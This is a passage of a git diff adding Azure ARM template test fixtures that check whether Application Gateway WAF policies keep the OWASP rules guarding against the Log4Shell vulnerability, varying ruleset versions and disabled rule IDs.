+                "id": "[resourceId('Microsoft.Network/applicationGateways/backendAddressPools', variables('applicationGateways_myAppGateway_name'), 'myBackendPool')]"
+              },
+              "backendHttpSettings": {
+                "id": "[resourceId('Microsoft.Network/applicationGateways/backendHttpSettingsCollection', variables('applicationGateways_myAppGateway_name'), 'myHTTPSetting')]"
+              }
+            }
+          }
+        ],
+        "enableHttp2": false,
+        "firewallPolicy": {
+          "id": "[resourceId('Microsoft.Network/ApplicationGatewayWebApplicationFirewallPolicies', variables('AppGW_AppFW_Pol_name'))]"
+        }
+      },
+      "dependsOn": [
+        "[resourceId('Microsoft.Network/ApplicationGatewayWebApplicationFirewallPolicies', variables('AppGW_AppFW_Pol_name'))]",
+        "[resourceId('Microsoft.Network/virtualNetworks', variables('virtualNetworks_myVNet_name'))]",
+        "publicIPAddress"
+      ]
+    },
+    {
+      "type": "Microsoft.Network/ApplicationGatewayWebApplicationFirewallPolicies",
+      "apiVersion": "2021-08-01",
+      "name": "owasp_3_0_fail",
+      "location": "[parameters('location')]",
+      "properties": {
+        "customRules": [
+          {
+            "name": "CustRule01",
+            "priority": 100,
+            "ruleType": "MatchRule",
+            "action": "Block",
+            "matchConditions": [
+              {
+                "matchVariables": [
+                  {
+                    "variableName": "RemoteAddr"
+                  }
+                ],
+                "operator": "IPMatch",
+                "negationConditon": true,
+                "matchValues": [
+                  "10.10.10.0/24"
+                ]
+              }
+            ]
+          }
+        ],
+        "policySettings": {
+          "requestBodyCheck": true,
+          "maxRequestBodySizeInKb": 128,
+          "fileUploadLimitInMb": 100,
+          "state": "Enabled",
+          "mode": "Prevention"
+        },
+        "managedRules": {
+          "managedRuleSets": [
+            {
+              "ruleSetType": "OWASP",
+              "ruleSetVersion": "3.0"
+            }
+          ]
+        }
+      }
+    },
+    {
+      "copy": {
+        "name": "myNic",
+        "count": "[length(range(0, 2))]"
+      },
+      "type": "Microsoft.Network/networkInterfaces",
+      "apiVersion": "2021-08-01",
+      "name": "[format('{0}{1}', variables('myNic_name'), add(range(0, 2)[copyIndex()], 1))]",
+      "location": "[parameters('location')]",
+      "properties": {
+        "ipConfigurations": [
+          {
+            "name": "[format('{0}{1}', variables('ipconfig_name'), add(range(0, 2)[copyIndex()], 1))]",
+            "properties": {
+              "privateIPAllocationMethod": "Dynamic",
+              "publicIPAddress": {
+                "id": "[resourceId('Microsoft.Network/publicIPAddresses', format('{0}{1}', variables('publicIPAddress_name'), add(range(0, 2)[copyIndex()], 1)))]"
+              },
+              "subnet": {
+                "id": "[resourceId('Microsoft.Network/virtualNetworks/subnets', variables('virtualNetworks_myVNet_name'), 'myBackendSubnet')]"
+              },
+              "primary": true,
+              "privateIPAddressVersion": "IPv4",
+              "applicationGatewayBackendAddressPools": [
+                {
+                  "id": "[resourceId('Microsoft.Network/applicationGateways/backendAddressPools', variables('applicationGateways_myAppGateway_name'), 'myBackendPool')]"
+                }
+              ]
+            }
+          }
+        ],
+        "enableAcceleratedNetworking": false,
+        "enableIPForwarding": false,
+        "networkSecurityGroup": {
+          "id": "[resourceId('Microsoft.Network/networkSecurityGroups', format('{0}{1}', variables('nsg_name'), add(range(0, 2)[copyIndex()], 1)))]"
+        }
+      },
+      "dependsOn": [
+        "[resourceId('Microsoft.Network/applicationGateways', variables('applicationGateways_myAppGateway_name'))]",
+        "[resourceId('Microsoft.Network/virtualNetworks', variables('virtualNetworks_myVNet_name'))]",
+        "nsg",
+        "publicIPAddress"
+      ]
+    }
+  ]
+}
diff --git a/tests/arm/checks/resource/example_AppGatewayWAFACLCVE202144228/owasp_3_1_default_pass.json b/tests/arm/checks/resource/example_AppGatewayWAFACLCVE202144228/owasp_3_1_default_pass.json
new file mode 100644
index 00000000000..35ce62af4c9
--- /dev/null
+++ b/tests/arm/checks/resource/example_AppGatewayWAFACLCVE202144228/owasp_3_1_default_pass.json
@@ -0,0 +1,249 @@
+{
+  "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
+  "contentVersion": "1.0.0.0",
+  "metadata": {
+    "_generator": {
+      "name": "bicep",
+      "version": "0.15.31.15270",
+      "templateHash": "7253194970749033988"
+    }
+  },
+  "parameters": {
+    "adminUsername": {
+      "type": "string",
+      "metadata": {
+        "description": "Admin username for the backend servers"
+      }
+    },
+    "adminPassword": {
+      "type": "securestring",
+      "metadata": {
+        "description": "Password for the admin account on the backend servers"
+      }
+    },
+    "location": {
+      "type": "string",
+      "defaultValue": "[resourceGroup().location]",
+      "metadata": {
+        "description": "Location for all resources."
+      }
+    },
+    "vmSize": {
+      "type": "string",
+      "defaultValue": "Standard_B2ms",
+      "metadata": {
+        "description": "Size of the virtual machine."
+      }
+    }
+  },
+  "variables": {
+    "virtualMachines_myVM_name": "myVM",
+    "virtualNetworks_myVNet_name": "myVNet",
+    "myNic_name": "net-int",
+    "ipconfig_name": "ipconfig",
+    "publicIPAddress_name": "public_ip",
+    "nsg_name": "vm-nsg",
+    "applicationGateways_myAppGateway_name": "myAppGateway",
+    "vnet_prefix": "10.0.0.0/16",
+    "ag_subnet_prefix": "10.0.0.0/24",
+    "backend_subnet_prefix": "10.0.1.0/24",
+    "AppGW_AppFW_Pol_name": "WafPol01"
+  },
+  "resources": [
+
+    {
+      "type": "Microsoft.Network/applicationGateways",
+      "apiVersion": "2021-08-01",
+      "name": "[variables('applicationGateways_myAppGateway_name')]",
+      "location": "[parameters('location')]",
+      "properties": {
+        "sku": {
+          "name": "WAF_v2",
+          "tier": "WAF_v2",
+          "capacity": 2
+        },
+        "gatewayIPConfigurations": [
+          {
+            "name": "appGatewayIpConfig",
+            "properties": {
+              "subnet": {
+                "id": "[resourceId('Microsoft.Network/virtualNetworks/subnets', variables('virtualNetworks_myVNet_name'), 'myAGSubnet')]"
+              }
+            }
+          }
+        ],
+        "frontendIPConfigurations": [
+          {
+            "name": "appGwPublicFrontendIp",
+            "properties": {
+              "privateIPAllocationMethod": "Dynamic",
+              "publicIPAddress": {
+                "id": "[resourceId('Microsoft.Network/publicIPAddresses', format('{0}0', variables('publicIPAddress_name')))]"
+              }
+            }
+          }
+        ],
+        "frontendPorts": [
+          {
+            "name": "port_80",
+            "properties": {
+              "port": 80
+            }
+          }
+        ],
+        "backendAddressPools": [
+          {
+            "name": "myBackendPool",
+            "properties": {}
+          }
+        ],
+        "backendHttpSettingsCollection": [
+          {
+            "name": "myHTTPSetting",
+            "properties": {
+              "port": 80,
+              "protocol": "Http",
+              "cookieBasedAffinity": "Disabled",
+              "pickHostNameFromBackendAddress": false,
+              "requestTimeout": 20
+            }
+          }
+        ],
+        "httpListeners": [
+          {
+            "name": "myListener",
+            "properties": {
+              "firewallPolicy": {
+                "id": "[resourceId('Microsoft.Network/ApplicationGatewayWebApplicationFirewallPolicies', variables('AppGW_AppFW_Pol_name'))]"
+              },
+              "frontendIPConfiguration": {
+                "id": "[resourceId('Microsoft.Network/applicationGateways/frontendIPConfigurations', variables('applicationGateways_myAppGateway_name'), 'appGwPublicFrontendIp')]"
+              },
+              "frontendPort": {
+                "id": "[resourceId('Microsoft.Network/applicationGateways/frontendPorts', variables('applicationGateways_myAppGateway_name'), 'port_80')]"
+              },
+              "protocol": "Http",
+              "requireServerNameIndication": false
+            }
+          }
+        ],
+        "requestRoutingRules": [
+          {
+            "name": "myRoutingRule",
+            "properties": {
+              "ruleType": "Basic",
+              "priority": 10,
+              "httpListener": {
+                "id": "[resourceId('Microsoft.Network/applicationGateways/httpListeners', variables('applicationGateways_myAppGateway_name'), 'myListener')]"
+              },
+              "backendAddressPool": {
+                "id": "[resourceId('Microsoft.Network/applicationGateways/backendAddressPools', variables('applicationGateways_myAppGateway_name'), 'myBackendPool')]"
+              },
+              "backendHttpSettings": {
+                "id": "[resourceId('Microsoft.Network/applicationGateways/backendHttpSettingsCollection', variables('applicationGateways_myAppGateway_name'), 'myHTTPSetting')]"
+              }
+            }
+          }
+        ],
+        "enableHttp2": false,
+        "firewallPolicy": {
+          "id": "[resourceId('Microsoft.Network/ApplicationGatewayWebApplicationFirewallPolicies', variables('AppGW_AppFW_Pol_name'))]"
+        }
+      },
+      "dependsOn": [
+        "[resourceId('Microsoft.Network/ApplicationGatewayWebApplicationFirewallPolicies', variables('AppGW_AppFW_Pol_name'))]",
+        "[resourceId('Microsoft.Network/virtualNetworks', variables('virtualNetworks_myVNet_name'))]",
+        "publicIPAddress"
+      ]
+    },
+    {
+      "type": "Microsoft.Network/ApplicationGatewayWebApplicationFirewallPolicies",
+      "apiVersion": "2021-08-01",
+      "name": "owasp_3_1_default_pass",
+      "location": "[parameters('location')]",
+      "properties": {
+        "customRules": [
+          {
+            "name": "CustRule01",
+            "priority": 100,
+            "ruleType": "MatchRule",
+            "action": "Block",
+            "matchConditions": [
+              {
+                "matchVariables": [
+                  {
+                    "variableName": "RemoteAddr"
+                  }
+                ],
+                "operator": "IPMatch",
+                "negationConditon": true,
+                "matchValues": [
+                  "10.10.10.0/24"
+                ]
+              }
+            ]
+          }
+        ],
+        "policySettings": {
+          "requestBodyCheck": true,
+          "maxRequestBodySizeInKb": 128,
+          "fileUploadLimitInMb": 100,
+          "state": "Enabled",
+          "mode": "Prevention"
+        },
+        "managedRules": {
+          "managedRuleSets": [
+            {
+              "ruleSetType": "OWASP",
+              "ruleSetVersion": "3.1"
+            }
+          ]
+        }
+      }
+    },
+    {
+      "copy": {
+        "name": "myNic",
+        "count": "[length(range(0, 2))]"
+      },
+      "type": "Microsoft.Network/networkInterfaces",
+      "apiVersion": "2021-08-01",
+      "name": "[format('{0}{1}', variables('myNic_name'), add(range(0, 2)[copyIndex()], 1))]",
+      "location": "[parameters('location')]",
+      "properties": {
+        "ipConfigurations": [
+          {
+            "name": "[format('{0}{1}', variables('ipconfig_name'), add(range(0, 2)[copyIndex()], 1))]",
+            "properties": {
+              "privateIPAllocationMethod": "Dynamic",
+              "publicIPAddress": {
+                "id": "[resourceId('Microsoft.Network/publicIPAddresses', format('{0}{1}', variables('publicIPAddress_name'), add(range(0, 2)[copyIndex()], 1)))]"
+              },
+              "subnet": {
+                "id": "[resourceId('Microsoft.Network/virtualNetworks/subnets', variables('virtualNetworks_myVNet_name'), 'myBackendSubnet')]"
+              },
+              "primary": true,
+              "privateIPAddressVersion": "IPv4",
+              "applicationGatewayBackendAddressPools": [
+                {
+                  "id": "[resourceId('Microsoft.Network/applicationGateways/backendAddressPools', variables('applicationGateways_myAppGateway_name'), 'myBackendPool')]"
+                }
+              ]
+            }
+          }
+        ],
+        "enableAcceleratedNetworking": false,
+        "enableIPForwarding": false,
+        "networkSecurityGroup": {
+          "id": "[resourceId('Microsoft.Network/networkSecurityGroups', format('{0}{1}', variables('nsg_name'), add(range(0, 2)[copyIndex()], 1)))]"
+        }
+      },
+      "dependsOn": [
+        "[resourceId('Microsoft.Network/applicationGateways', variables('applicationGateways_myAppGateway_name'))]",
+        "[resourceId('Microsoft.Network/virtualNetworks', variables('virtualNetworks_myVNet_name'))]",
+        "nsg",
+        "publicIPAddress"
+      ]
+    }
+  ]
+}
diff --git a/tests/arm/checks/resource/example_AppGatewayWAFACLCVE202144228/owasp_3_1_disabled_different_pass.json b/tests/arm/checks/resource/example_AppGatewayWAFACLCVE202144228/owasp_3_1_disabled_different_pass.json
new file mode 100644
index 00000000000..29e7d9c3a4a
--- /dev/null
+++ b/tests/arm/checks/resource/example_AppGatewayWAFACLCVE202144228/owasp_3_1_disabled_different_pass.json
@@ -0,0 +1,260 @@
+{
+  "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
+  "contentVersion": "1.0.0.0",
+  "metadata": {
+    "_generator": {
+      "name": "bicep",
+      "version": "0.15.31.15270",
+      "templateHash": "7253194970749033988"
+    }
+  },
+  "parameters": {
+    "adminUsername": {
+      "type": "string",
+      "metadata": {
+        "description": "Admin username for the backend servers"
+      }
+    },
+    "adminPassword": {
+      "type": "securestring",
+      "metadata": {
+        "description": "Password for the admin account on the backend servers"
+      }
+    },
+    "location": {
+      "type": "string",
+      "defaultValue": "[resourceGroup().location]",
+      "metadata": {
+        "description": "Location for all resources."
+      }
+    },
+    "vmSize": {
+      "type": "string",
+      "defaultValue": "Standard_B2ms",
+      "metadata": {
+        "description": "Size of the virtual machine."
+      }
+    }
+  },
+  "variables": {
+    "virtualMachines_myVM_name": "myVM",
+    "virtualNetworks_myVNet_name": "myVNet",
+    "myNic_name": "net-int",
+    "ipconfig_name": "ipconfig",
+    "publicIPAddress_name": "public_ip",
+    "nsg_name": "vm-nsg",
+    "applicationGateways_myAppGateway_name": "myAppGateway",
+    "vnet_prefix": "10.0.0.0/16",
+    "ag_subnet_prefix": "10.0.0.0/24",
+    "backend_subnet_prefix": "10.0.1.0/24",
+    "AppGW_AppFW_Pol_name": "WafPol01"
+  },
+  "resources": [
+
+
+    {
+      "type": "Microsoft.Network/applicationGateways",
+      "apiVersion": "2021-08-01",
+      "name": "[variables('applicationGateways_myAppGateway_name')]",
+      "location": "[parameters('location')]",
+      "properties": {
+        "sku": {
+          "name": "WAF_v2",
+          "tier": "WAF_v2",
+          "capacity": 2
+        },
+        "gatewayIPConfigurations": [
+          {
+            "name": "appGatewayIpConfig",
+            "properties": {
+              "subnet": {
+                "id": "[resourceId('Microsoft.Network/virtualNetworks/subnets', variables('virtualNetworks_myVNet_name'), 'myAGSubnet')]"
+              }
+            }
+          }
+        ],
+        "frontendIPConfigurations": [
+          {
+            "name": "appGwPublicFrontendIp",
+            "properties": {
+              "privateIPAllocationMethod": "Dynamic",
+              "publicIPAddress": {
+                "id": "[resourceId('Microsoft.Network/publicIPAddresses', format('{0}0', variables('publicIPAddress_name')))]"
+              }
+            }
+          }
+        ],
+        "frontendPorts": [
+          {
+            "name": "port_80",
+            "properties": {
+              "port": 80
+            }
+          }
+        ],
+        "backendAddressPools": [
+          {
+            "name": "myBackendPool",
+            "properties": {}
+          }
+        ],
+        "backendHttpSettingsCollection": [
+          {
+            "name": "myHTTPSetting",
+            "properties": {
+              "port": 80,
+              "protocol": "Http",
+              "cookieBasedAffinity": "Disabled",
+              "pickHostNameFromBackendAddress": false,
+              "requestTimeout": 20
+            }
+          }
+        ],
+        "httpListeners": [
+          {
+            "name": "myListener",
+            "properties": {
+              "firewallPolicy": {
+                "id": "[resourceId('Microsoft.Network/ApplicationGatewayWebApplicationFirewallPolicies', variables('AppGW_AppFW_Pol_name'))]"
+              },
+              "frontendIPConfiguration": {
+                "id": "[resourceId('Microsoft.Network/applicationGateways/frontendIPConfigurations', variables('applicationGateways_myAppGateway_name'), 'appGwPublicFrontendIp')]"
+              },
+              "frontendPort": {
+                "id": "[resourceId('Microsoft.Network/applicationGateways/frontendPorts', variables('applicationGateways_myAppGateway_name'), 'port_80')]"
+              },
+              "protocol": "Http",
+              "requireServerNameIndication": false
+            }
+          }
+        ],
+        "requestRoutingRules": [
+          {
+            "name": "myRoutingRule",
+            "properties": {
+              "ruleType": "Basic",
+              "priority": 10,
+              "httpListener": {
+                "id": "[resourceId('Microsoft.Network/applicationGateways/httpListeners', variables('applicationGateways_myAppGateway_name'), 'myListener')]"
+              },
+              "backendAddressPool": {
+                "id": "[resourceId('Microsoft.Network/applicationGateways/backendAddressPools', variables('applicationGateways_myAppGateway_name'), 'myBackendPool')]"
+              },
+              "backendHttpSettings": {
+                "id": "[resourceId('Microsoft.Network/applicationGateways/backendHttpSettingsCollection', variables('applicationGateways_myAppGateway_name'), 'myHTTPSetting')]"
+              }
+            }
+          }
+        ],
+        "enableHttp2": false,
+        "firewallPolicy": {
+          "id": "[resourceId('Microsoft.Network/ApplicationGatewayWebApplicationFirewallPolicies', variables('AppGW_AppFW_Pol_name'))]"
+        }
+      },
+      "dependsOn": [
+        "[resourceId('Microsoft.Network/ApplicationGatewayWebApplicationFirewallPolicies', variables('AppGW_AppFW_Pol_name'))]",
+        "[resourceId('Microsoft.Network/virtualNetworks', variables('virtualNetworks_myVNet_name'))]",
+        "publicIPAddress"
+      ]
+    },
+    {
+      "type": "Microsoft.Network/ApplicationGatewayWebApplicationFirewallPolicies",
+      "apiVersion": "2021-08-01",
+      "name": "owasp_3_1_disabled_different_pass",
+      "location": "[parameters('location')]",
+      "properties": {
+        "customRules": [
+          {
+            "name": "CustRule01",
+            "priority": 100,
+            "ruleType": "MatchRule",
+            "action": "Block",
+            "matchConditions": [
+              {
+                "matchVariables": [
+                  {
+                    "variableName": "RemoteAddr"
+                  }
+                ],
+                "operator": "IPMatch",
+                "negationConditon": true,
+                "matchValues": [
+                  "10.10.10.0/24"
+                ]
+              }
+            ]
+          }
+        ],
+        "policySettings": {
+          "requestBodyCheck": true,
+          "maxRequestBodySizeInKb": 128,
+          "fileUploadLimitInMb": 100,
+          "state": "Enabled",
+          "mode": "Prevention"
+        },
+        "managedRules": {
+          "managedRuleSets": [
+            {
+              "ruleGroupOverrides": [
+            {
+              "ruleGroupName": "REQUEST-944-APPLICATION-ATTACK-JAVA",
+              "rules": [
+                {
+                  "ruleId": "944200"
+                }
+              ]
+            }
+          ],
+              "ruleSetType": "OWASP",
+              "ruleSetVersion": "3.1"
+            }
+          ]
+        }
+      }
+    },
+    {
+      "copy": {
+        "name": "myNic",
+        "count": "[length(range(0, 2))]"
+      },
+      "type": "Microsoft.Network/networkInterfaces",
+      "apiVersion": "2021-08-01",
+      "name": "[format('{0}{1}', variables('myNic_name'), add(range(0, 2)[copyIndex()], 1))]",
+      "location": "[parameters('location')]",
+      "properties": {
+        "ipConfigurations": [
+          {
+            "name": "[format('{0}{1}', variables('ipconfig_name'), add(range(0, 2)[copyIndex()], 1))]",
+            "properties": {
+              "privateIPAllocationMethod": "Dynamic",
+              "publicIPAddress": {
+                "id": "[resourceId('Microsoft.Network/publicIPAddresses', format('{0}{1}', variables('publicIPAddress_name'), add(range(0, 2)[copyIndex()], 1)))]"
+              },
+              "subnet": {
+                "id": "[resourceId('Microsoft.Network/virtualNetworks/subnets', variables('virtualNetworks_myVNet_name'), 'myBackendSubnet')]"
+              },
+              "primary": true,
+              "privateIPAddressVersion": "IPv4",
+              "applicationGatewayBackendAddressPools": [
+                {
+                  "id": "[resourceId('Microsoft.Network/applicationGateways/backendAddressPools', variables('applicationGateways_myAppGateway_name'), 'myBackendPool')]"
+                }
+              ]
+            }
+          }
+        ],
+        "enableAcceleratedNetworking": false,
+        "enableIPForwarding": false,
+        "networkSecurityGroup": {
+          "id": "[resourceId('Microsoft.Network/networkSecurityGroups', format('{0}{1}', variables('nsg_name'), add(range(0, 2)[copyIndex()], 1)))]"
+        }
+      },
+      "dependsOn": [
+        "[resourceId('Microsoft.Network/applicationGateways', variables('applicationGateways_myAppGateway_name'))]",
+        "[resourceId('Microsoft.Network/virtualNetworks', variables('virtualNetworks_myVNet_name'))]",
+        "nsg",
+        "publicIPAddress"
+      ]
+    }
+  ]
+}
diff --git a/tests/arm/checks/resource/example_AppGatewayWAFACLCVE202144228/owasp_3_1_disabled_fail.json b/tests/arm/checks/resource/example_AppGatewayWAFACLCVE202144228/owasp_3_1_disabled_fail.json
new file mode 100644
index 00000000000..da52c7ae166
--- /dev/null
+++ b/tests/arm/checks/resource/example_AppGatewayWAFACLCVE202144228/owasp_3_1_disabled_fail.json
@@ -0,0 +1,157 @@
+{
+  "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
+  "contentVersion": "1.0.0.0",
+  "metadata": {
+    "_generator": {
+      "name": "bicep",
+      "version": "0.15.31.15270",
+      "templateHash": "7253194970749033988"
+    }
+  },
+  "parameters": {
+    "adminUsername": {
+      "type": "string",
+      "metadata": {
+        "description": "Admin username for the backend servers"
+      }
+    },
+    "adminPassword": {
+      "type": "securestring",
+      "metadata": {
+        "description": "Password for the admin account on the backend servers"
+      }
+    },
+    "location": {
+      "type": "string",
+      "defaultValue": "[resourceGroup().location]",
+      "metadata": {
+        "description": "Location for all resources."
+      }
+    },
+    "vmSize": {
+      "type": "string",
+      "defaultValue": "Standard_B2ms",
+      "metadata": {
+        "description": "Size of the virtual machine."
+      }
+    }
+  },
+  "variables": {
+    "virtualMachines_myVM_name": "myVM",
+    "virtualNetworks_myVNet_name": "myVNet",
+    "myNic_name": "net-int",
+    "ipconfig_name": "ipconfig",
+    "publicIPAddress_name": "public_ip",
+    "nsg_name": "vm-nsg",
+    "applicationGateways_myAppGateway_name": "myAppGateway",
+    "vnet_prefix": "10.0.0.0/16",
+    "ag_subnet_prefix": "10.0.0.0/24",
+    "backend_subnet_prefix": "10.0.1.0/24",
+    "AppGW_AppFW_Pol_name": "WafPol01"
+  },
+  "resources": [
+
+
+    {
+      "type": "Microsoft.Network/ApplicationGatewayWebApplicationFirewallPolicies",
+      "apiVersion": "2021-08-01",
+      "name": "owasp_3_1_disabled_fail",
+      "location": "[parameters('location')]",
+      "properties": {
+        "customRules": [
+          {
+            "name": "CustRule01",
+            "priority": 100,
+            "ruleType": "MatchRule",
+            "action": "Block",
+            "matchConditions": [
+              {
+                "matchVariables": [
+                  {
+                    "variableName": "RemoteAddr"
+                  }
+                ],
+                "operator": "IPMatch",
+                "negationConditon": true,
+                "matchValues": [
+                  "10.10.10.0/24"
+                ]
+              }
+            ]
+          }
+        ],
+        "policySettings": {
+          "requestBodyCheck": true,
+          "maxRequestBodySizeInKb": 128,
+          "fileUploadLimitInMb": 100,
+          "state": "Enabled",
+          "mode": "Prevention"
+        },
+
+        "managedRules": {
+          "managedRuleSets": [
+            {
+              "ruleGroupOverrides": [
+            {
+              "ruleGroupName": "REQUEST-944-APPLICATION-ATTACK-JAVA",
+              "rules": [
+                {
+                  "ruleId": "944240"
+                }
+              ]
+            }
+          ],
+              "ruleSetType": "OWASP",
+              "ruleSetVersion": "3.1"
+            }
+          ]
+        }
+
+      }
+    },
+    {
+      "copy": {
+        "name": "myNic",
+        "count": "[length(range(0, 2))]"
+      },
+      "type": "Microsoft.Network/networkInterfaces",
+      "apiVersion": "2021-08-01",
+      "name": "[format('{0}{1}', variables('myNic_name'), add(range(0, 2)[copyIndex()], 1))]",
+      "location": "[parameters('location')]",
+      "properties": {
+        "ipConfigurations": [
+          {
+            "name": "[format('{0}{1}', variables('ipconfig_name'), add(range(0, 2)[copyIndex()], 1))]",
+            "properties": {
+              "privateIPAllocationMethod": "Dynamic",
+              "publicIPAddress": {
+                "id": "[resourceId('Microsoft.Network/publicIPAddresses', format('{0}{1}', variables('publicIPAddress_name'), add(range(0, 2)[copyIndex()], 1)))]"
+              },
+              "subnet": {
+                "id": "[resourceId('Microsoft.Network/virtualNetworks/subnets', variables('virtualNetworks_myVNet_name'), 'myBackendSubnet')]"
+              },
+              "primary": true,
+              "privateIPAddressVersion": "IPv4",
+              "applicationGatewayBackendAddressPools": [
+                {
+                  "id": "[resourceId('Microsoft.Network/applicationGateways/backendAddressPools', variables('applicationGateways_myAppGateway_name'), 'myBackendPool')]"
+                }
+              ]
+            }
+          }
+        ],
+        "enableAcceleratedNetworking": false,
+        "enableIPForwarding": false,
+        "networkSecurityGroup": {
+          "id": "[resourceId('Microsoft.Network/networkSecurityGroups', format('{0}{1}', variables('nsg_name'), add(range(0, 2)[copyIndex()], 1)))]"
+        }
+      },
+      "dependsOn": [
+        "[resourceId('Microsoft.Network/applicationGateways', variables('applicationGateways_myAppGateway_name'))]",
+        "[resourceId('Microsoft.Network/virtualNetworks', variables('virtualNetworks_myVNet_name'))]",
+        "nsg",
+        "publicIPAddress"
+      ]
+    }
+  ]
+}
diff --git a/tests/arm/checks/resource/example_AppGatewayWAFACLCVE202144228/owasp_3_2_default_pass.json b/tests/arm/checks/resource/example_AppGatewayWAFACLCVE202144228/owasp_3_2_default_pass.json
new file mode 100644
index 00000000000..351ca8b3be8
--- /dev/null
+++ b/tests/arm/checks/resource/example_AppGatewayWAFACLCVE202144228/owasp_3_2_default_pass.json
@@ -0,0 +1,249 @@
+{
+  "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
+  "contentVersion": "1.0.0.0",
+  "metadata": {
+    "_generator": {
+      "name": "bicep",
+      "version": "0.15.31.15270",
+      "templateHash": "7253194970749033988"
+    }
+  },
+  "parameters": {
+    "adminUsername": {
+      "type": "string",
+      "metadata": {
+        "description": "Admin username for the backend servers"
+      }
+    },
+    "adminPassword": {
+      "type": "securestring",
+      "metadata": {
+        "description": "Password for the admin account on the backend servers"
+      }
+    },
+    "location": {
+      "type": "string",
+      "defaultValue": "[resourceGroup().location]",
+      "metadata": {
+        "description": "Location for all resources."
+      }
+    },
+    "vmSize": {
+      "type": "string",
+      "defaultValue": "Standard_B2ms",
+      "metadata": {
+        "description": "Size of the virtual machine."
+      }
+    }
+  },
+  "variables": {
+    "virtualMachines_myVM_name": "myVM",
+    "virtualNetworks_myVNet_name": "myVNet",
+    "myNic_name": "net-int",
+    "ipconfig_name": "ipconfig",
+    "publicIPAddress_name": "public_ip",
+    "nsg_name": "vm-nsg",
+    "applicationGateways_myAppGateway_name": "myAppGateway",
+    "vnet_prefix": "10.0.0.0/16",
+    "ag_subnet_prefix": "10.0.0.0/24",
+    "backend_subnet_prefix": "10.0.1.0/24",
+    "AppGW_AppFW_Pol_name": "WafPol01"
+  },
+  "resources": [
+
+    {
+      "type": "Microsoft.Network/applicationGateways",
+      "apiVersion": "2021-08-01",
+      "name": "[variables('applicationGateways_myAppGateway_name')]",
+      "location": "[parameters('location')]",
+      "properties": {
+        "sku": {
+          "name": "WAF_v2",
+          "tier": "WAF_v2",
+          "capacity": 2
+        },
+        "gatewayIPConfigurations": [
+          {
+            "name": "appGatewayIpConfig",
+            "properties": {
+              "subnet": {
+                "id": "[resourceId('Microsoft.Network/virtualNetworks/subnets', variables('virtualNetworks_myVNet_name'), 'myAGSubnet')]"
+              }
+            }
+          }
+        ],
+        "frontendIPConfigurations": [
+          {
+            "name": "appGwPublicFrontendIp",
+            "properties": {
+              "privateIPAllocationMethod": "Dynamic",
+              "publicIPAddress": {
+                "id": "[resourceId('Microsoft.Network/publicIPAddresses', format('{0}0', variables('publicIPAddress_name')))]"
+              }
+            }
+          }
+        ],
+        "frontendPorts": [
+          {
+            "name": "port_80",
+            "properties": {
+              "port": 80
+            }
+          }
+        ],
+        "backendAddressPools": [
+          {
+            "name": "myBackendPool",
+            "properties": {}
+          }
+        ],
+        "backendHttpSettingsCollection": [
+          {
+            "name": "myHTTPSetting",
+            "properties": {
+              "port": 80,
+              "protocol": "Http",
+              "cookieBasedAffinity": "Disabled",
+              "pickHostNameFromBackendAddress": false,
+              "requestTimeout": 20
+            }
+          }
+        ],
+        "httpListeners": [
+          {
+            "name": "myListener",
+            "properties": {
+              "firewallPolicy": {
+                "id": "[resourceId('Microsoft.Network/ApplicationGatewayWebApplicationFirewallPolicies', variables('AppGW_AppFW_Pol_name'))]"
+              },
+              "frontendIPConfiguration": {
+                "id": "[resourceId('Microsoft.Network/applicationGateways/frontendIPConfigurations', variables('applicationGateways_myAppGateway_name'), 'appGwPublicFrontendIp')]"
+              },
+              "frontendPort": {
+                "id": "[resourceId('Microsoft.Network/applicationGateways/frontendPorts', variables('applicationGateways_myAppGateway_name'), 'port_80')]"
+              },
+              "protocol": "Http",
+              "requireServerNameIndication": false
+            }
+          }
+        ],
+        "requestRoutingRules": [
+          {
+            "name": "myRoutingRule",
+            "properties": {
+              "ruleType": "Basic",
+              "priority": 10,
+              "httpListener": {
+                "id": "[resourceId('Microsoft.Network/applicationGateways/httpListeners', variables('applicationGateways_myAppGateway_name'), 'myListener')]"
+              },
+              "backendAddressPool": {
+                "id": "[resourceId('Microsoft.Network/applicationGateways/backendAddressPools', variables('applicationGateways_myAppGateway_name'), 'myBackendPool')]"
+              },
+              "backendHttpSettings": {
+                "id": "[resourceId('Microsoft.Network/applicationGateways/backendHttpSettingsCollection', variables('applicationGateways_myAppGateway_name'), 'myHTTPSetting')]"
+              }
+            }
+          }
+        ],
+        "enableHttp2": false,
+        "firewallPolicy": {
+          "id": "[resourceId('Microsoft.Network/ApplicationGatewayWebApplicationFirewallPolicies', variables('AppGW_AppFW_Pol_name'))]"
+        }
+      },
+      "dependsOn": [
+        "[resourceId('Microsoft.Network/ApplicationGatewayWebApplicationFirewallPolicies', variables('AppGW_AppFW_Pol_name'))]",
+        "[resourceId('Microsoft.Network/virtualNetworks', variables('virtualNetworks_myVNet_name'))]",
+        "publicIPAddress"
+      ]
+    },
+    {
+      "type": "Microsoft.Network/ApplicationGatewayWebApplicationFirewallPolicies",
+      "apiVersion": "2021-08-01",
+      "name": "owasp_3_2_default_pass",
+      "location": "[parameters('location')]",
+      "properties": {
+        "customRules": [
+          {
+            "name": "CustRule01",
+            "priority": 100,
+            "ruleType": "MatchRule",
+            "action": "Block",
+            "matchConditions": [
+              {
+                "matchVariables": [
+                  {
+                    "variableName": "RemoteAddr"
+                  }
+                ],
+                "operator": "IPMatch",
+                "negationConditon": true,
+                "matchValues": [
+                  "10.10.10.0/24"
+                ]
+              }
+            ]
+          }
+        ],
+        "policySettings": {
+          "requestBodyCheck": true,
+          "maxRequestBodySizeInKb": 128,
+          "fileUploadLimitInMb": 100,
+          "state": "Enabled",
+          "mode": "Prevention"
+        },
+        "managedRules": {
+          "managedRuleSets": [
+            {
+              "ruleSetType": "OWASP",
+              "ruleSetVersion": "3.2"
+            }
+          ]
+        }
+      }
+    },
+    {
+      "copy": {
+        "name": "myNic",
+        "count": "[length(range(0, 2))]"
+      },
+      "type": "Microsoft.Network/networkInterfaces",
+      "apiVersion": "2021-08-01",
+      "name": "[format('{0}{1}', variables('myNic_name'), add(range(0, 2)[copyIndex()], 1))]",
+      "location": "[parameters('location')]",
+      "properties": {
+        "ipConfigurations": [
+          {
